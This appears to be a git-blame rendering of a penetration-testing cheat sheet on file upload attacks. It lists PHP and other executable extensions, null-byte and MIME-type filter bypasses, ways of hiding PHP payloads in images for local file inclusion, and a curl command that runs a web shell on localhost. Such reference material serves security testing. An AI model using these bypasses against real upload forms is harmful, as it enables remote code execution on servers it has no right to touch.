2016-10-18 11:13:23 +00:00
# Upload
2018-08-12 21:30:22 +00:00
2017-06-04 15:22:26 +00:00
Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
2016-10-18 11:13:23 +00:00
2019-06-09 16:13:15 +00:00
## Summary
* [Tools ](#tools )
* [Exploits ](#exploits )
* [PHP Extension ](#php-extension )
* [Other extensions ](#other-extensions )
* [Upload tricks ](#upload-tricks )
* [Picture upload with LFI ](#picture-upload-with-lfi )
* [Configuration Files ](#configuration-files )
* [CVE - Image Tragik ](#cve---image-tragik )
* [References ](#references )
2019-03-03 15:31:17 +00:00
## Tools
- [Fuxploider ](https://github.com/almandin/fuxploider )
2016-10-18 11:13:23 +00:00
## Exploits
2018-08-12 21:30:22 +00:00
### PHP Extension
```powershell
2016-10-18 11:13:23 +00:00
.php
2019-02-15 15:00:50 +00:00
.php3
.php4
.php5
.php7
2016-10-18 11:13:23 +00:00
2019-02-15 15:00:50 +00:00
Less known extensions
2016-10-18 11:13:23 +00:00
.pht
2019-02-15 15:00:50 +00:00
.phar
.phpt
2016-10-18 11:13:23 +00:00
.pgif
.phtml
2019-04-08 20:49:50 +00:00
.phtm
2016-10-18 11:13:23 +00:00
2019-02-15 15:00:50 +00:00
Double extensions
2016-10-18 11:13:23 +00:00
.jpeg.php
2019-02-15 15:00:50 +00:00
.jpg.php
2016-10-18 11:13:23 +00:00
.png.php
```
2019-06-09 16:13:15 +00:00
### Other extensions
```powershell
2019-11-16 13:53:42 +00:00
asp : .asp, .aspx, .cer and .asa (IIS < = 7.5), shell.aspx;1.jpg (IIS < 7.0 )
2019-06-09 16:13:15 +00:00
perl: .pl, .pm, .cgi, .lib
jsp : .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion: .cfm, .cfml, .cfc, .dbm
```
2019-02-15 15:00:50 +00:00
### Upload tricks
2018-08-12 21:30:22 +00:00
2019-09-02 10:36:40 +00:00
- Null byte (works well against `pathinfo()` )
* .php%00.gif
* .php\x00.gif
* .php%00.png
* .php\x00.png
* .php%00.jpg
* .php\x00.jpg
2019-02-15 15:00:50 +00:00
- Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
2019-09-02 10:36:40 +00:00
* `Content-Type : image/gif`
* `Content-Type : image/png`
* `Content-Type : image/jpeg`
2018-08-12 21:30:22 +00:00
2019-02-15 15:00:50 +00:00
### Picture upload with LFI
2016-10-18 08:01:56 +00:00
2019-02-15 15:00:50 +00:00
Valid pictures hosting PHP code. Upload the picture and use a local file inclusion to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"` .
2018-08-12 21:30:22 +00:00
2019-02-15 15:00:50 +00:00
- Picture Metadata, hide the payload inside a comment tag in the metadata.
- Picture Resize, hide the payload within the compression algorithm in order to bypass a resize. Also defeating `getimagesize()` and `imagecreatefromgif()` .
2018-08-12 21:30:22 +00:00
2019-02-15 15:00:50 +00:00
### Configuration Files
2017-06-04 15:22:26 +00:00
2019-02-15 15:00:50 +00:00
- .htaccess
- web.config
- httpd.conf
- \_\_init\_\_.py
2017-06-04 15:22:26 +00:00
2019-02-15 15:00:50 +00:00
### CVE - Image Tragik
2017-06-04 15:22:26 +00:00
2019-02-15 15:00:50 +00:00
```powershell
HTTP Request
Reverse Shell
Touch command
2017-06-04 15:22:26 +00:00
```
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
2017-06-04 15:22:26 +00:00
* Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil
2019-02-15 15:00:50 +00:00
* [BookFresh Tricky File Upload Bypass to RCE, NOV 29, 2014 - AHMED ABOUL-ELA ](https://secgeek.net/bookfresh-vulnerability/ )
* [Encoding Web Shells in PNG IDAT chunks, 04-06-2012, phil ](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/ )
2019-04-08 20:49:50 +00:00
* [La PNG qui se prenait pour du PHP, 23 février 2014 ](https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/ )
2019-06-16 21:45:52 +00:00
* [File Upload restrictions bypass - Haboob Team ](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf )